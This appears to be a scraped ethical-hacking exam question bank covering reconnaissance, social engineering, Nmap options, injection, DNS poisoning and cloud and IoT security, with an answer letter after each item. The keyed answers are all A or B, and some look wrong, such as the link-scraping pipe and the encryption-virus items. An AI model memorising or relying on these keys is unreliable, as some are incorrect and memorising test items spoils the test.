Which of the following is NOT a hacking phase? A Gathering B Gaining access C Reconnaissance D Scanning

A

Which of the following is a component of a risk assessment? A. Administrative safeguards B. Physical security C. DMZ D. Logical interface

A

Which of the following is a low-tech way of gaining unauthorized access to systems? A. Social Engineering B. Eavesdropping C. Scanning D. Sniffing

A

Which of the following is a place where a wireless network is available for public use? A Hotspot B Radius C Bandwidth D Advanced Encryption Standards

A

Which of the following is a security architecture developed to increase the confidentiality of information exchanged over the insecure internet? A Public Key Infrastructure (PKI) B Internet connection monitor C Data Encryption Standard (DES) D Wi-Fi networks monitor

A

Which of the following is a shim that runs in the user mode and is used by attackers to bypass UAC and perform different attacks including the disabling of Windows Defender and backdoor installation? A RedirectEXE B Schtasks C launchd D WinRM

A

Which of the following is effective only when servers use weak or flawed session-ID generation mechanisms? A Guessing B DoS attacks C Stealing D Brute forcing

A

Which of the following is the BEST way to defend against network sniffing? A. Using encryption protocols to secure network communications B. Register all machines MAC Address in a Centralized Database C. Use Static IP Address D. Restrict Physical Access to Server Rooms hosting Critical Servers

A

Which of the following is the first and one of the most important steps toward hacking a target website? A Information gathering B None of these options C Webserver footprinting D Reconnaissance

A

Which of the following provide message secrecy, integrity, and authentication of the sender? A Modern ciphers B Classical ciphers C System integrity verifiers D Government Access to Keys (GAK)

A

Which of the following scanning technique involves resetting the TCP connection between the client and the server abruptly before completion of the three-way handshake signals? A Stealth Scan B TCP Connect Scan C Inverse TCP Flag Scan D Xmas Scan

A

Which of the following social engineering techniques does not fall under the category of computer-based social engineering? A Quid Pro Quo B Spam Mail C Scareware D Phishing

A

Which of the following tools is used to analyze the files produced by several packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek? A. tcptrace B. Nessus C. OpenVAS D. tcptraceroute

A

Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a Linux platform? A. Kismet B. Abel C. Netstumbler D. Nessus

A

Which of the following tools performs comprehensive tests against web servers, including dangerous files and CGIs? A. Nikto B. John the Ripper C. Dsniff D. Snort

A

Which system consists of a publicly available set of databases that contain domain name registration contact information? A. WHOIS B. CAPTCHA C. IANA D. IETF

A

Which term is a category of cyber threat intelligence? A Operational B Adversarial C Kinetic D Logical

A

Which type of attack involves wireless LANs being detected either by sending probe requests over a connection or by listening to web beacons? A WarDriving B Ad-hoc associations C AP misconfiguration D MAC spoofing

A

Which type of attack is pulse wave? A DDoS B Protocol C Zero-Day D Multi-Vector

A

Which type of security feature stops vehicles from crashing through the doors of a building? A. Bollards B. Receptionist C. Mantrap D. Turnstile

A

Which type of virus can change its own code and then cipher itself multiple times as it replicates? A. Stealth virus B. Tunneling virus C. Cavity virus D. Encryption virus

A

Which type of virus has been designed to thwart attempts by analysts from examining its code? A Armored B Logic Bomb C Stealth D Cluster

A

While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, "Learn more about your friends!", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt's bank account has been accessed, and the password has been changed. What most likely happened? A. Matt inadvertently provided the answers to his security questions when responding to the post. B. Matt inadvertently provided his password when responding to the post. C. Matt's computer was infected with a keylogger. D. Matt's bank-account login information was brute forced

A

With ________, attackers hide their attack code by encrypting it with an unknown encryption algorithm and including the decryption code as part of the attack packet. A Polymorphic shellcodes B War driving C MAC spoofing D Ad-hoc associations

A

With the help of social-engineering tricks, attackers can obtain confidential information, authorization details, and access details of people by deceiving and manipulating them. A True B False

A

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist's email, and you send her an email changing the source email to her boss's email (boss@company). In this email, you ask for a pdf with the information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use? A. Social engineering B. Piggybacking C. Tailgating D. Eavesdropping

A

You are the Network Admin, and you get a complaint that some of the websites are no longer accessible. You try to ping the servers and find them to be reachable. Then you type the IP address and then you try on the browser, and find it to be accessible. But they are not accessible when you try using the URL. What may be the problem? A. Traffic is Blocked on UDP Port 53 B. Traffic is Blocked on TCP Port 80 C. Traffic is Blocked on TCP Port 54 D. Traffic is Blocked on UDP Port 80

A

You are working as a Security Analyst in a company XYZ that owns the whole subnet range of 23.0.0.0/8 and 192.168.0.0/8.While monitoring the data, you find a high number of outbound connections. You see that IPs owned by XYZ (Internal) and private IPs are communicating to aSingle Public IP. Therefore, the Internal IPs are sending data to the Public IP.After further analysis, you find out that this Public IP is a blacklisted IP, and the internal communicating devices are compromised. What kind of attack does the above scenario depict? A. Botnet Attack B. Spear Phishing Attack C. Advanced Persistent Threats D. Rootkit Attack

A

You start performing a penetration test against a specific website and have decided to start from grabbing all the links from the main page. What is the best Linux pipe to achieve your milestone? A. wget https://site.com | grep "<a href="http" | grep "site.com" B. curl -s https://site.com | grep "<a href=\ "http" | grep "site.com" | cut -d '\' -f2 C. dirb https://site.com | grep "site" D. wget https://site.com | cut -d "http"

A

________ are individuals who use their extraordinary computing skills for illegal or malicious purposes. A Black Hats B Gray Hats C Hacktivists D White Hats

A

________ controls discover and react appropriately to the incidents that happen. A Detective B Preventive C Corrective D Deterrent

A

________ involve(s) gathering information about a target organization such as URLs, locations, establishment details, number of employees, the specific range of domain names, contact information, etc. A Footprinting methodology B Information leakage C Corporate espionage D System and network attacks

A

________ is a process of monitoring and capturing all data packets passing through a given network using a software application or a hardware device. A Packet sniffing B Internet software C Malicious software D System hacking

A

________ is a publicly available and free list or dictionary of standardized identifiers for common software vulnerabilities and exposures. A CVE B CSV C CVVS D CVSS

A

________ is a published standard that provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. A CVSS B CVE C CVVS D CSV

A

________ is a technique used to compromise the security of network switches that connect network segments or network devices. A MAC flooding B Trojan horse C Internet monitoring D Overt interception

A

________ is an Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including potentially dangerous files/programs, and checks for outdated versions of servers and version specific problems on servers. A Nikto B Nessus Professional C OpenVAS D Qualys VM

A

________ is an assessment solution for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. It performs vulnerability, configuration, and compliance assessment. A Nessus Professional B Nikto C Qualys VM D OpenVAS

A

________ is one of the main stages during system hacking. A Covering tracks B Spyware C Salting D Spiking

A

________ is one of the password cracking techniques that involves attempting to log on to target systems with different passwords manually. A Password guessing B Hybrid attack C Corporate espionage D Hybrid attacking

A

________ is software used for open-source intelligence and forensics. It is useful during the information-gathering phase of all security-related work. A Maltego B Recon-Dog C FOCA D Recon-ng

A

________ is the part of a malware or an exploit that performs the intended malicious actions, which can include creating backdoor access to a victim's machine, damaging or deleting files, and data theft. A Payload B Vulnerability C Exploit D Hack value

A

________ is the technique used for mimicking legitimate institutions, such as banks, in an attempt to steal passwords, credit card and bank account data, and other sensitive information. A Spear-Phishing B Black Hat Search Engine Optimization (SEO) C Social Engineered Click-Jacking D Drive-by Downloads

A

________ is/are generally used by attackers to perform sniffing on the target network. This technique allows attackers to steal sensitive information, prevent network and web access, and perform DoS and MITM attacks. A ARP poisoning B Trojan horses C Address filing D Wrappers

A

________ social engineering involves malicious mobile applications with attractive features. A Mobile-based B Human-based C Social-based D Computer-based

A

________ uses specialized social-engineering content directed at a specific employee or small group of employees in a particular organization to obtain sensitive data. A Spear-Phishing B Whaling C Pop-up D Spam

A

_________ is a set of extensions to DNS that provide the origin authentication of DNS data to DNS clients (resolvers) so as to reduce the threat of DNS poisoning, spoofing, and similar types of attacks. A. DNSSEC B. Resource records C. Resource transfer D. Zone transfer

A

iOS is a mobile operating system that is installed and used on Windows devices. A False B True

A

A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here? A. Desynchronization B. Slowloris attack C. Session splicing D. Phlashing

B

A ________ is a "document established by consensus and approved by a recognized body that provides, for common and repeated use, rules, guidelines, or characteristics for activities or their results, aimed at the achievement of the optimum degree of order in a given context." A regulation B standard C data file D law

B

A ________ is a basic network scanning technique to determine which range of IP addresses maps to live hosts (computers). A ICMP ECHO B ping sweep C Nmap D ping scan

B

A ________ is a device that interprets traffic passing over a network. A protocol analyzer B hardware protocol analyzer C network line D data sniffer

B

A bank stores and processes sensitive privacy information related to home loans. However, auditing has never been enabled on the system. What is the first step that the bank should take before enabling the audit feature? A. Perform a vulnerability scan of the system. B. Determine the impact of enabling the audit feature. C. Perform a cost/benefit analysis of the audit feature. D. Allocate funds for staffing of audit log review.

B

A community cloud is a single-tenant infrastructure shared among organizations from a specific community with common computing concerns. A True B False

B

A company's security policy states that all Web browsers must automatically delete their HTTP browser cookies upon terminating. What sort of security breach is this policy attempting to mitigate? A. Attempts by attackers to access the user and password information stored in the company's SQL database. B. Attempts by attackers to access Web sites that trust the Web browser user by stealing the user's authentication credentials. C. Attempts by attackers to access passwords stored on the user's computer without the user's knowledge. D. Attempts by attackers to determine the user's Web browser usage patterns, including when sites were visited and for how long.

B

A computer connected to a local area network (LAN) has two addresses: a/an ________ and a/an ________. A internet address / common access address B MAC address / Internet Protocol address C machine address / broadcast address D Search Engine Optimization (SEO) address / cache address

B

A disadvantage of single-point anonymizers is that they use arms-length communication that protects IP address and related identifying information. A True B False

B

A documented change-management process is less secure than the ad-hoc process. A True B False

B

A firewall and an Intrusion Detection System (IDS) can detect SQL-injection attempts based on pre-defined signatures. A False B True

B

A hotfix is a package used to address a critical defect in a live environment and contains a fix for a single issue. A False B True

B

A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the Prometric Online Testing - Reports https://ibt1.prometric.com/users/custom/report_queue/rq_str... corporate network. What tool should the analyst use to perform a Blackjacking attack? A. Paros Proxy B. BBProxy C. Blooover D. BBCrack

B

A man-in-the-browser attack is exactly the same as a man-in-the-middle attack. A True B False

B

A networked anonymizer passes information through several internet computers, which causes it to become easier to trace. A True B False

B

A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that were confusing in concluding the Operating System(OS) version installed. Considering that NMAP result below, which of the following is likely to be installed on the target machine by the OS? Starting NMAP 5.21 at2011-03-15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:8 A. The host is likely a Linux machine. B. The host is likely a printer. C. The host is likely a router. D. The host is likely a Windows machine.

B

A security zone is an area within a network that consists of a group of systems and other components with the same characteristics, all of which serve to manage a secure network. A False B True

B

A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway they are both on the192.168.1.0/24. Which of the following has occurred? A. The computer is not using a private IP address. B. The gateway is not routing to a public IP address. C. The gateway and the computer are not on the same network. D. The computer is using an invalid IP address.

B

A webserver can host only one website. A True B False

B

A/An ________ is a self-replicating program that produces its own code by attaching copies of itself to other executable codes, and operates without the knowledge or desire of the user. A Trojan B virus C program file D internet file

B

Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries. Which of the following tiers of the container technology architecture is Abel currently working in? A. Tier-1: Developer machines B. Tier-2: Testing and accreditation systems C. Tier-3: Registries D. Tier-4: Orchestrators

B

Adding white spaces using special characters like tab, carriage return, or linefeeds makes an SQL statement completely untraceable without changing the execution of the statement. A False B True

B

Advantages of writing applications in the PaaS environment include dynamic scalability, automated backups, and other platform services, without the need to explicitly code for it. A False B True

B

Although FTP traffic is not encrypted by default, which layer 3 protocol would allow for end-to-end encryption of the connection? A. SFTP B. IPsec C. SSL D. FTPS

B

An IDS is placed on a network to detect malicious activities. A False B True

B

An attacker engages in ________ attempts using information collected in earlier footprinting, scanning, and enumeration phases. A footprinting B system hacking C networking D penetration testing

B

An attacker is using DumpsterDiver, an automated tool, to identify potential secret leaks and hardcoded passwords in target cloud services. Which of the following flags is set by the attacker to analyze the files using rules specified in "rules.yaml"? A -r, --remove B -a, --advance C -s, --secret D -o OUTFILE

B

An attacker performs vulnerability scanning in order to identify security loopholes in the target network that attackers exploit to launch attacks. A False B True

B

An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim's data. What type of attack is this? A. Vishing B. Phishing C. DDoS D. Spoofing

B

An attacker, using a rogue wireless AP, performed an MITM attack and injected an HTML code to embed a malicious applet in all HTTP connections.When users accessed any page, the applet ran and exploited many machines. Which one of the following tools the hacker probably used to inject HTML code? A. Wireshark B. Ettercap C. Aircrack-ng D. Tcpdump

B

An external assessment estimates the threat of network security attacks external to the organization. It determines how secure the external network and firewall are. A False B True

B

An external assessment involves scrutinizing the internal network to find exploits and vulnerabilities. A True B False

B

An insider is any employee (trusted person) without any access to an organization's privileged assets. A True B False

B

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task? A. UDP scan B. ARP ping scan C. ACK flag probe scan D. TCP Maimon scan

B

Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used by Annie in the above scenario? A. Docker objects B. Docker daemon C. Docker client D. Docker registries

B

Application assessments determine the possible network security attacks that may occur on an organization's system. A True B False

B

At what stage of the cyber kill chain theory model does data exfiltration occur? A. Weaponization B. Actions on objectives C. Command and control D. Installation

B

Attackers follow a certain methodology to perform SQL-injection attacks to ensure that these attacks are successful by analyzing all the possible methods to perform the attack. A False B True

B

Attackers injecting malware into legitimate-looking websites to trick users into clicking them is called ________. A Spear-Phishing B Social Engineered Click-Jacking C Drive-by Downloads D Black Hat Search Engine Optimization (SEO)

B

Attackers perform ________ attacks by extracting information about encryption keys by observing the emission of signals from IoT devices. A egress B side channel C side load D ingress

B

Attackers perform ________ social engineering using various malicious programs such as viruses, Trojans, spyware, and software applications. A personal B computer-based C reverse D human-based

B

Attackers use malware to commit online fraud or theft. Therefore, anti-malware software should be used to combat it. A False B True

B

Attackers use various types of tricks and techniques to view, manipulate, insert, and delete data from an application's configuration. A True B False

B

Bluebugging is the theft of information from a wireless device through a Bluetooth connection, often between phones, desktops, laptops, PDAs, and others. A True B False

B

BullGuard Mobile Security is an app for ________ devices that provides total protection for mobile devices and personal data. A iOS B Android C Windows D Blackberry

B

By exploiting ________ in web applications, attackers can easily read, write, delete, and update any data. A network-applications B injection flaws C application files D web data

B

By studying the sequential pattern of the session-hijacking process and generating many requests, an attacker can easily alleviate the search space necessary to produce a valid session ID. A False B True

B

By using a smart card and pin, you are using a two-factor authentication that satisfies A. Something you are and something you remember B. Something you have and something you know C. Something you know and something you are D. Something you have and something you are

B

Confidentiality controls include data classification, data encryption, and proper equipment disposal. A False B True

B

Controls such as biometrics, smart cards, and digital certificates ensure the authenticity of data, transactions, communications, or documents. A False B True

B

DHCP snooping is a great solution to prevent rogue DHCP servers on your network. Which security feature on switches leverages the DHCP snooping database to help prevent man-in-the-middle attacks? A. Spanning tree B. Dynamic ARP Inspection (DAI) C. Port security D. Layer 2 Attack Prevention Protocol (LAPP)

B

Data security is critical to online business and privacy of communication. A False B True

B

Defense in Depth is a security strategy in which security professionals use several protection layers throughout an information system. A False B True

B

Defense in Depth uses the military principle that it is more difficult for an enemy to defeat a complex and multi-layered defense system than to penetrate a single barrier. A False B True

B

Despite having security policies in place, attackers can compromise an organization's sensitive information by means of social engineering, as it targets the strengths in people. A True B False

B

Domain controllers are the only computers that can act as webservers because they have the required software installed and constantly connect to the internet. A True B False

B

Employees typically are NOT aware that they have inadvertently disclosed an organization's critical information. A False B True

B

Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs. Which two SQL injection types would give her the results she is looking for? A. Out of band and boolean-based B. Union-based and error-based C. Time-based and union-based D. Time-based and boolean-based

B

Ethical hacking highlights the remedial actions and also reduces information and communications technology (ICT) costs by resolving those vulnerabilities. A False B True

B

Footprinting is the ________ phase of hacking in which the attacker gains ________ information about a potential target. A first / secondary B first / primary C second / secondary D second / primary

B

Hackers are intelligent individuals with excellent computer skills—with the ability to create and explore the computer's software and hardware. A False B True

B

Hacking is defined as the exploitation of vulnerabilities of computer systems and networks. A False B True

B

Hacktivists use hacking to increase awareness of their social or political agendas, as well as themselves, in both the online and offline arenas. A False B True

B

Heather's company has decided to use a new customer relationship management tool. After performing the appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative task that Heather will need to perform is the management of user accounts. The provider will take care of the hardware, operating system, and software administration including patching and monitoring. Which of the following is this type of solution? A. Iaas B. Saas C. PaaS D. Caas

B

How many basic types of source-code reviews are there? A One B Two C Four D Three

B

How many common cloud deployment models are there? A Three B Four C Five D Two

B

How many types of SQL injection are there? A Three B Several C One D Four

B

IA refers to the assurance of the integrity, availability, confidentiality, and authenticity of information and information systems during usage, processing, storage, and transmission of information assurance with the help of physical, technical, and administrative controls. A False B True

B

IP address spoofing is a hijacking technique in which an attacker obtains a computer's IP address, alters the packet headers, and sends request packets to a target machine—pretending to be a legitimate host. A False B True

B

IPv6 decreases the size of IP address space from 128 bits to 32 bits to support more levels of addressing hierarchy. A True B False

B

Identify the DNS poisoning technique in which the attacker infects the victim's machine with a Trojan and changes his/her DNS IP address to that of the attacker's. A Proxy Server DNS Poisoning B Internet DNS Spoofing C DNS Cache Poisoning D Intranet DNS Spoofing

B

Identify the category of information warfare that uses various techniques such as propaganda and terror, to demoralize one's adversary in an attempt to succeed in battle. A Hacker warfare B Psychological warfare C Electronic warfare D Economic warfare

B

Identify the web application attack where the attackers exploit vulnerabilities in dynamically generated web pages to inject client-side script into web pages viewed by other users. A. LDAP Injection attack B. Cross-Site Scripting (XSS) C. SQL injection attack D. Cross-Site Request Forgery (CSRF)

B

Identify the wireless attacks in which WLANs are detected either by sending probe requests over a connection or by listening to web beacons? A MAC spoofing B WarDriving C Client mis-association D WEP Injection

B

If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option could the tester use to get a response from a host using TCP? A. Traceroute B. Hping C. TCP ping D. Broadcast ping

B

If you want to only scan fewer ports than the default scan using Nmap tool, which option would you use? A. -r B. -F C. -P D. -sP

B

In ________, the attacker tries to redirect the victim to a malicious server instead of the legitimate server. A eviscerating Trojans B DNS poisoning C defacement Trojans D pen testing files

B

In a ________ environment, a single bus connects all hosts, which compete for bandwidth. A download B shared Ethernet C Search Engine Optimization (SEO) D social engineered

B

In a ________, the attacker exploits vulnerabilities in a computer application before the software developer can release a patch for them. A payload B zero-day attack C hack value D vulnerability

B

In a client-server model architecture, the web server plays the part of the ________ and the browser acts as the ________. A backup storage / web host B server / client C client / server D web host / backup storage

B

In active scanning, the attacker interacts directly with the target network to find vulnerabilities. A False B True

B

In passive scanning, the attacker tries to find vulnerabilities without directly interacting with the target network. A False B True

B

In public clouds, the provider makes services such as applications, servers, and data storage available to the public over the internet. A False B True

B

In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm? A. IDEA B. Triple Data Encryption Standard C. AES D. MD5 encryption algorithm

B

In which of the following SQL injection attacks does an attacker delete the database information, delete logs, or audit information stored in a database? A Authentication Bypass B Compromised Availability of Data C Compromised Data Integrity D Information Disclosure

B

In which of the following attacks does an attacker compromise a DNS server and changes its mapping settings to redirect the user's requests to the attacker's rogue server? A DNS Rebinding Attack B DNS Server Hijacking C DNS Amplification Attack D DNS Poisoning

B

In which of the following attacks does an attacker dump memory by rebooting a victim's device with a malicious OS and then extract sensitive data from the dumped memory? A iOS jailbreaking B OS data caching C Carrier-loaded software D User-initiated code

B

In which of the following attacks does an attacker exploit the vulnerability residing in a bare-metal cloud server and use it to implant a malicious backdoor in its firmware? A Wrapping attack B Cloudborne attack C Cryptanalysis attack D Cross-site scripting attack

B

In which of the following social engineering attacks does an attacker present him/herself as an authority and the target seeks his or her advice before or after offering the information that the attacker needs? A Quid Pro Quo B Reverse Social Engineering C Diversion Theft D Elicitation

B

In which of the following types of attack does an attacker exploit the carrier-sense multiple access with collision avoidance (CSMA/CA) clear channel assessment (CCA) mechanism to make a channel appear busy? A Beacon flood B Denial of service C Access point theft D EAP failure

B

In which of the following types of hijacking can an attacker inject malicious data or commands into intercepted communications in a TCP session, even if the victim disables source routing? A RST hijacking B Blind hijacking C UDP hijacking D Session fixation

B

In which type of attack do attackers use a group of compromised systems (bots or zombies), usually infected with Trojans, to perform a Denial-of-Service attack on a target system or network resource? A Peer-to-peer B DDoS C TCP state-exhaustion D Application layer

B

In which type of hijacking does the attacker obtain the session IDs to get control of an existing session or to create a new unauthorized session? A Network-level B Application-level C Peer-to-peer D TCP Stat-level

B

Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology? A. Scanning B. Gaining access C. Maintaining access D. Reconnaissance

B

Information Assurance and Information Risk Management (IRM) ensure that only authorized personnel access and use information. A False B True

B

Information security is defined as "a state of well-being of information and infrastructure in which the possibility of theft, tampering, and disruption of information and services is kept low and tolerable." A False B True

B

Information security relies on four major elements: confidentiality, integrity, availability, and authenticity. A True B False

B

Insider attacks occur because of financial gain, collusion with outsiders, and disgruntled employees. A False B True

B

IoT devices are regularly infected by malware or malicious code and are easy prey for hackers. A False B True

B

IoT security is difficult to ensure as the devices use simple processors and stripped down operating systems that may NOT support sophisticated security approaches. A False B True

B

IoT solutions are limited to home use products, such as wearables, appliances, connected electronic devices, and smart vehicles. A True B False

B

IoT technology has been developed undertaking appropriate consideration for the security of the devices and it is NOT necessary for security professionals to test the devices for various vulnerabilities before integrating IoT into an infrastructure. A True B False

B

It is NOT necessary to disable the "guest" and "demo" user accounts or use the "Lock Out" feature to lock out accounts as IoT inherently implements strong authentication mechanisms, leverages control system networks and devices behind firewalls, and isolates them from the business network by default. A True B False

B

It is not important to identify the appropriate source for updates and patches; they can be downloaded almost anywhere. A True B False

B

Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario? A. Session hijacking B. Website mirroring C. Website defacement D. Web cache poisoning

B

Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used Nmap to scan open ports and running services on systems connected to the organization's OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information? A. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP > B. nmap -Pn -sU -p 44818 --script enip-info < Target IP > C. nmap -Pn -sT -p 46824 < Target IP > D. nmap -Pn -sT -p 102 --script s7-info < Target IP >

B

John is investigating web-application firewall logs and observers that someone is attempting to inject the following: char buff[10]; buff[10] = 'a'; What type of attack is this? A. SQL injection B. Buffer overflow C. CSRF D. XSS

B

Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario? A. Diversion theft B. Quid pro quo (aka "something for something" attack) C. Elicitation D. Phishing

B

Law enforcement agencies worldwide use GAK keys to monitor suspicious communication and to collect evidence of cybercrimes in the interest of national security. A False B True

B

MDM does not help organizations implement enterprise-wide policies. A True B False

B

Many users do not enable security on their mobile devices because they feel the devices are safe. A False B True

B

Measures to maintain data availability do not include redundant systems' disk array and clustered machines, antivirus software to stop worms from destroying networks, and distributed denial-of-service (DDoS) prevention systems. A True B False

B

Measures to maintain data integrity may include a checksum and access control. A False B True

B

Mobile device security is a secondary security concern for the IT sector, with network security being the primary concern. A True B False

B

Most IoT devices come with security issues, such as absence of proper authentication mechanism, lock-out mechanism, strong encryption scheme, or proper key management systems. A False B True

B

Official organizational security policies and procedures should at a minimum include the following safeguards: password policies, physical security policies, training, access privileges, classification of information, proper incident response time, and proper termination process. A False B True

B

Once spread over the system, ________ can destroy or change all content present in a database. A eviscerating Trojans B defacement Trojans C bank files D pen testing files

B

One of the most important considerations is the development of a secure IoT framework for building the device. A False B True

B

PCs are surpassing smartphones as the preferred devices to access the internet and manage communications. A True B False

B

Packet fragmentation, source routing, and IP address spoofing are attempts to circumvent detection techniques employed by IDS. A False B True

B

Passive assessments sniff the traffic present on the network to identify the working systems, network services, applications, and vulnerabilities. A False B True

B

Patches are released by the vendor, but are NOT publicly available. A True B False

B

Pen testers do NOT need hacking knowledge to assess the security of target systems. A True B False

B

Peter is surfing the internet looking for information about DX Company. Which hacking process is Peter doing? A. Scanning B. Footprinting C. Enumeration D. System Hacking

B

Placing web servers in the DMZ, a separate segment, adds security barriers to the web server from the internal network as well as the outside public network. A False B True

B

Proxy chaining assists attackers in increasing their level of anonymity. A False B True

B

Reconnaissance is one of the most important phases of intelligence gathering for an attacker. A True B False

B

Remote wipe services allow you to reset or erase the information on the lost or stolen device. A False B True

B

SMiShing is a type of phishing fraud in which the attacker utilizes SMS systems to send bogus text messages. A False B True

B

SQL injection is a flaw in web applications and not a database or webserver issue. A False B True

B

SQL injection is not that common and does not cause much damage when launched against a website. A True B False

B

SYN/FIN scanning using IP fragments was created to avoid false positives generated by other scans because of a packet-filtering device on the target system. A False B True

B

Safety measures that help an organization to prevent or minimize insider threats are separation and rotation of duties, least privileges, controlled access, logging and auditing, legal policies, and archive critical data. A False B True

B

Sam is working as a system administrator in an organization. He captured the principal characteristics of a vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize the organization's vulnerability management processes. The base score that Sam obtained after performing CVSS rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario? A. Critical B. Medium C. High D. Low

B

Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can be performed by exploiting the above vulnerability? A. Padding oracle attack B. DROWN attack C. DUHK attack D. Side-channel attack

B

Separation of duties prevents conflict of interest, illegal acts, fraud, abuse, and error, and helps in identifying security control failures, including information theft, security breaches, and evasion of security controls. A False B True

B

Session hijacking enables attackers to place themselves between the ________ and the ________, so that all information—traveling in either direction—must pass through them. A system controls / online controls B authorized client / webserver C session-token generation mechanism / token-security controls D tokens / security controls

B

Session management mechanisms are the key security components in most web applications. A False B True

B

Social engineering attacks on organizations are NOT serious threats and do not cost the organization anything. A True B False

B

Social engineering is categorized into ________ types. A four B three C five D two HINT: Human-based, computer-based, and mobile-based

B

Social engineers lure targets to divulge information by promising something for nothing. A False B True

B

Software-as-a-Service (SaaS) does NOT offer applications software to subscribers on-demand over the internet. A True B False

B

Some clients of TPNQM SA were redirected to a malicious site when they tried to access the TPNQM main site. Bob, a system administrator at TPNQM SA, found that they were victims of DNS Cache Poisoning. What should Bob recommend to deal with such a threat? A. The use of security agents in clients' computers B. The use of DNSSEC C. The use of double-factor authentication D. Client awareness

B

Spyware is a stealthy computer monitoring software that allows you to secretly record all the user activities on the target computer. A False B True

B

Steganography is classified into ________ area(s) according to technique. A four B two C three D one

B

Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on walking patterns and implemented this approach to a physical control access. A camera captures people walking and identifies the individuals using Steve's approach. After that, people must approximate their RFID badges. Both the identifications are required to open the door. In this case, we can say: A. Although the approach has two phases, it actually implements just one authentication factor B. The solution implements the two authentication factors: physical object and physical characteristic C. The solution will have a high level of false positives D. Biological motion cannot be used to identify people

B

TCP is connectionless, which prioritizes connection establishment before data transfer between applications. A True B False

B

Taylor, a security professional, uses a tool to monitor her company's website, analyze the website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario? A. Webroot B. Web-Stat C. WebSite-Watcher D. WAFW00F

B

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered.John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan? A. nmap -sn -PO < target IP address > B. nmap -sn -PS < target IP address > C. nmap -sn -PA < target IP address > D. nmap -sn -PP < target IP address >

B

The "Gray-box testing" methodology enforces what kind of restriction? A. Only the external operation of a system is accessible to the tester. B. The internal operation of a system in only partly accessible to the tester. C. Only the internal operation of a system is known to the tester. D. The internal operation of a system is completely known to the tester.

B

The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE's Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520. What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy? A. Public B. Private C. Shared D. Root

B

The RSA signature scheme is the last technique used to generate digital signatures. A True B False

B

The Whois tools help to determine who, where, and when a domain or site was registered—and the information about those who support it now. A False B True

B

